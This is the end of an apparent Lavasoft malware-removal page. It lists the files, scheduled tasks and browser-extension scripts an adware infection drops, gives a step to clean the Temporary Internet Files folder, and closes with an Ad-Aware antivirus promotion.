      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (6584 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (614 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (869 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\380[1].js (25 bytes)
      %WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (138 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (921 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateHelper.msi (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (5 bytes)
      %WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-2.job (71 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (1 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe (5873 bytes)
      %WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-5.job (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psmachine.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\391[1].js (795 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (1 bytes)
      %Program Files%\winservice86\utils.exe (76825 bytes)
      %WinDir%\Tasks\0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (70 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe (14022 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\354[1].js (60025 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe (601 bytes)
      %WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (140 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (359414 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\390[1].js (823 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (617 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (415 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\376[1].js (1417 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (3 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.crx (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psuser.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\339[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\102[1].js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\311[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg_code[1].js (432 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (43318 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (4 bytes)
      %Program Files%\winservice86\Uninstall.exe (601 bytes)
      %Program Files%\winservice86\SuperSocket.ClientEngine.Core.dll (26 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (410 bytes)
      %Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (6 bytes)

    4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.

    No votes yet


    Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
    © 2026 Lavasoft. All rights reserved.
    Terms Of Use |   Privacy Policy


    x

    Our best antivirus yet!

    Fresh new look. Faster scanning. Better protection.

    Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

    For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

    Download adaware antivirus 12
    No thanks, continue to lavasoft.com
    close x

    Discover the new adaware antivirus 12

    Our best antivirus yet

    Download Now